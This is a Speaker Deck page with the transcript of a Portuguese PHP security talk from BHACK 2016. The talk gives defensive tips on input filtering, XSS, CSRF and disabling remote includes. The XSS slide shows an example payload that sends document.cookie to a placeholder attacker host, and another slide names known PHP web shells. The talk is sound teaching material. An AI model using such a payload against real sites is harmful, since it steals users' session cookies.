Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Dicas de segurança para o PHP e seus amigos
Search
Joubert RedRat
November 18, 2016
Technology
0
25
Dicas de segurança para o PHP e seus amigos
Joubert RedRat
November 18, 2016
Tweet
Share
More Decks by Joubert RedRat
See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
18
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
21
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
15
O poder do Object Calisthenics no PHP
joubertredrat
0
87
Playing with Docker and Docker Compose
joubertredrat
0
110
Why migrate your application to microservices?
joubertredrat
0
15
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
24
Uso prático de fakes para mocks no Golang
joubertredrat
0
77
Brincando com comandos no Golang
joubertredrat
0
160
Other Decks in Technology
See All in Technology
元旅行会社の情シス部員が教えるおすすめなre:Inventへの行き方 / What is the most efficient way to re:Invent
naospon
2
340
ハイパーパラメータチューニングって何をしているの
toridori_dev
0
140
Security-JAWS【第35回】勉強会クラウドにおけるマルウェアやコンテンツ改ざんへの対策
4su_para
0
170
20241120_JAWS_東京_ランチタイムLT#17_AWS認定全冠の先へ
tsumita
2
240
Amplify Gen2 Deep Dive / バックエンドの型をいかにしてフロントエンドへ伝えるか #TSKaigi #TSKaigiKansai #AWSAmplifyJP
tacck
PRO
0
370
Taming you application's environments
salaboy
0
180
Engineer Career Talk
lycorp_recruit_jp
0
130
Terraform Stacks入門 #HashiTalks
msato
0
350
ノーコードデータ分析ツールで体験する時系列データ分析超入門
negi111111
0
410
B2B SaaSから見た最近のC#/.NETの進化
sansantech
PRO
0
720
ドメインの本質を掴む / Get the essence of the domain
sinsoku
2
150
The Rise of LLMOps
asei
6
1.3k
Featured
See All Featured
Building Better People: How to give real-time feedback that sticks.
wjessup
364
19k
How STYLIGHT went responsive
nonsquared
95
5.2k
[RailsConf 2023] Rails as a piece of cake
palkan
52
4.9k
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Imperfection Machines: The Place of Print at Facebook
scottboms
265
13k
Navigating Team Friction
lara
183
14k
Designing for humans not robots
tammielis
250
25k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
16
2.1k
Making Projects Easy
brettharned
115
5.9k
5 minutes of I Can Smell Your CMS
philhawksworth
202
19k
The Pragmatic Product Professional
lauravandoore
31
6.3k
Transcript
Dicas de segurança para o PHP e seus amigos BHACK
2016 – SEGURANÇA TI CONHECIMENTO
Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no
meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos INFORMAÇÃO
É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos 1ª
DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 3ª
DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos 4ª
DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 4ª
DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja
Dicas de segurança para o PHP e seus amigos 6ª
DICA EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 7ª
DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos 8ª
DICA CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 8ª
DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 9ª
DICA USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos 9ª
DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos ACABOU
AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM
joubertredrat
naospon
toridori_dev
4su_para
tsumita
tacck
salaboy
lycorp_recruit_jp
msato
negi111111
sansantech
sinsoku
asei
wjessup
nonsquared
palkan
addyosmani
jlugia
scottboms
lara
tammielis
eileencodes
brettharned
philhawksworth
lauravandoore
